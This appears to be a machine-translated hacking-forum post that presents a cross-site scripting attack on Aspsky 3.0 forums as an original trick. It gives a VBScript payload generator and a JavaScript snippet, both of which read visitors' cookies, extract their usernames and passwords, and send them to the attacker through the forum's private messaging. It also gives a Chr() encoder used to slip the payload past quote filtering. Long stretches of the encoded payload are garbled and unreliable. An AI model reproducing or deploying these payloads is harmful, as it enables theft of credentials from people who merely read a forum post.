cookie| Script | solve | problem
The Self.window way to see the wings of lust
In fact, I've always had a way to never tell anyone:
Played for a long time to announce the hehe:
<script language=vbs>
Sub Changeq ()
If form1.loc.value= "" or form1.who.value= "" Then
MsgBox "No address or user name added?"
Exit Sub
End If
Loc=form1.loc.value
User=form1.who.value
Str= "rtadjacenthtml" ("BeforeEnd" "," "<div style=display:none&
Gt;<iframe id=sendmessage></iframe></div> ""): Call SE
Ndmessage.window.open ("" "& Loc &"/messanger.asp?action=send&touser= "
& user & "&title=" +mid (Document.cookie,instr LCase (Document.cookie),
"" "Password" "+9,10) +" "&message=" "+" "I am a Goo
D Boy "", "" _self "") "/>"
Form1.area.value=str
End Sub
</script>
<body>
<font size=7 Color=red>aspsky 3.0 Steal---c.z.y original </FONT>
<form name=form1>
Set send address: <input type=text name=loc size=50><br>
▲ Send address form like: Http://www.nnit30.com/newbbs (Newbbs is the installation directory of forum in the website
At last
Do not add/) <br>
User name sent: <input type=text name=who size=20>-------------
<input Type=button name=change value= Generate Code Onclick=changeq () ><br>
Generated code:) <textarea Name=area rows=10 cols=100></textarea>
</form>
</body>
The results of most of the day, steal the Aspsky 3.0 code to change the following
Then sent to your post, as long as someone read your posts, his password will automatically send to your
The mailbox in the forum, cool bar, in fact, I was written in VBScript snwcwt with JavaScript
Write a problem without double quotes and can write several lines of code at the same time so be practical!!
But the effect is almost ha: (note to first change the following Dongdong address sent
After all written in one line)
R ($) &CHR (119) &CHR (119) &CHR (119) &CHR (a) &chr (a) &chr (a) &CHR (116) &chr
(&CHR) &CHR (&CHR) &CHR (a) &CHR (109) &CHR (a) &chr (a) &CHR (a) & Chr (119
&CHR () &chr (&CHR) &CHR (a) &CHR (109) &CHR (a) &CHR () &CHR (+) &CHR (&c)
HR (a) &CHR (&CHR) &CHR (114) &CHR (&CHR) &chr () &CHR () 112 (63) &chr
(&CHR) &CHR (116) &CHR (a) &chr (a) &chr (a) &CHR (101) &CHR (a) &CHR (1
&CHR () &CHR &CHR (116) &CHR (a) &CHR (117) &CHR (m) &chr (a) &CHR (114) &CHR (6
1) &CHR (122) &CHR (121) &CHR (&CHR) &CHR (116) &CHR (a) &CHR (116) &CHR (108) & Chr (101
) &CHR (&CHR) &CHR (a) &chr (a) &CHR (&CHR) &CHR ((a) & Chr (115)
&CHR () &chr (&CHR) &CHR (a) &CHR () +chr () &chr () &CHR (115) &ch
R (LCase) +mid (Document.cookie), InStr (LCase (Document.cookie), Chr (112) +CHR () +c
HR (+CHR) +CHR (119) +CHR () +CHR (114) +CHR (m) +9,len (Document.cookie)-ins
TR (LCase (document.cookie), Chr (112) +CHR (+CHR) +CHR (+) +CHR (+) 119
HR (114) +CHR) (+9) +CHR (a) +CHR (m) +chr (a) +CHR (m) +chr (&CHR) &CHR
R (&CHR) +mid (LCase (Document.cookie), InStr (LCase (Document.cookie), Chr (117) +
Chr (+CHR) +CHR (114) +CHR (+CHR) +CHR () 109 (a) +CHR (a)) +9, InStr (LCase (Do
Cument.cookie), Chr (117) +CHR (a) +CHR (+CHR) 114 (() +CHR () +CHR (108) +CHR () +CHR (
)-1)-instr (LCase (Document.cookie), Chr (117) +CHR () +chr (i) +CHR (114) +CHR (11
0) +CHR (+CHR) (109) +CHR (a)) -9), Chr (a) &CHR (a), Chr (116) &CHR (a) &CHR (112) (
&CHR (a) &CHR (m) &chr (a) &chr (a) &CHR () &CHR (108) &CHR (a) &CHR (102) &CHR (116) &
Chr (&CHR) &CHR (a) &chr (a) &chr (a) &chr (a) &CHR (m) &CHR (105) &CHR (1
&CHR () &CHR (116) &CHR (a) &CHR (&CHR) &CHR (a) 119 (m) &CHR (a) & Chr (116
&CHR () &CHR () &chr) "alt=" a perfect solution to the cookie-boxed problem of Cross-site scripting-cross-Station cookies >
Simplified form: window.open (open connection, form name, form size setting)
Open connections:
The first part:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send .....
The corresponding encoding is
Chr () &CHR (116) &CHR (116) &CHR (112) &CHR (a) &CHR (&CHR) &CHR ($) 119 &
Chr (119) &CHR (119) &CHR (&CHR) &CHR (a) &chr (a) &CHR (48) 116 (a) &CHR (Wuyi) &CHR &ch
R (&CHR) &CHR &CHR (109) &CHR (a) &CHR (&CHR) &CHR (a) 119 (98) &CHR (9
8) &CHR (&CHR) &CHR (109) &CHR () &CHR (+) &CHR (+) &CHR () &CHR (&) Chr (103
) &CHR (114) &CHR (&CHR) &chr (&CHR) &CHR () 112 () &CHR () &CHR () &CHR ( &CH)
R (116) &CHR (a) &chr (a) &chr (a) &chr (a) &CHR () &CHR (a) &CHR (100) &ch
R (&CHR) (116) &CHR (a) &CHR (117) &CHR () &CHR (a) &CHR (114) &CHR (99) &CHR (
122) &CHR (121) &CHR (a) &CHR (116) &CHR (a) &CHR (116) &CHR (108) &CHR (a) &CHR (61) &CHR (1
&CHR (&CHR) &chr (&CHR) &CHR (109) &CHR (a) &chr (a) &CHR (115) &CHR (9
7) &CHR (&CHR) &CHR (61)
Different sites have to change their attention to where they ended and the names of the users they sent here are changed here.
For encoding, look at the following code:
<script language=vbs>
Sub Main ()
Base=form1.text1.value
For I=1 to Len (base)
AA=ASC (Mid (base,i,1))
document.write "Chr (" & AA & ")" & "&"
Next
End Sub
</script>
<body ><form name=form1><table>
<tr><td>
<input Type=text Name=text1 size=40><br>
<input Type=button name=button1 onclick=main () value=change>
</td></tr>
</table></form></body>
Part II: User name and password in the extracted cookie
------------------------One more JS to learn----------------------------------
' username=\ '); var iuser1=mycookie.indexof (\ ' &\ ', IUSER0); if (iuser1==-1) iuser1=my
Cookie.length;var username=mycookie.substring (iuser0+9,iuser1); var Ipw0=mycookie
. indexOf (\ ' password=\ '); Ipw1=mycookie.indexof (\ ' &\ ', iPW0); if (ipw1==-1) Ipw1=myco
Okie.length;var password=mycookie.substring (IPW0+9,IPW1);d OCUMENT.BODY.INSERTADJ
Acenthtml (\ ' beforeend\ ', \ ' <div style=display:block><iframe id=sendmessage src=me
Ssanger.asp?action=new&touser=snwcwt></iframe></div>\ '); sendmessage.window.docum
Ent.location=\ ' cwt&title=\ ' +username+\ ' password &message=username=\ ' +username+\ ' password=\ ' +pa
Ssword+\ '; ') ' />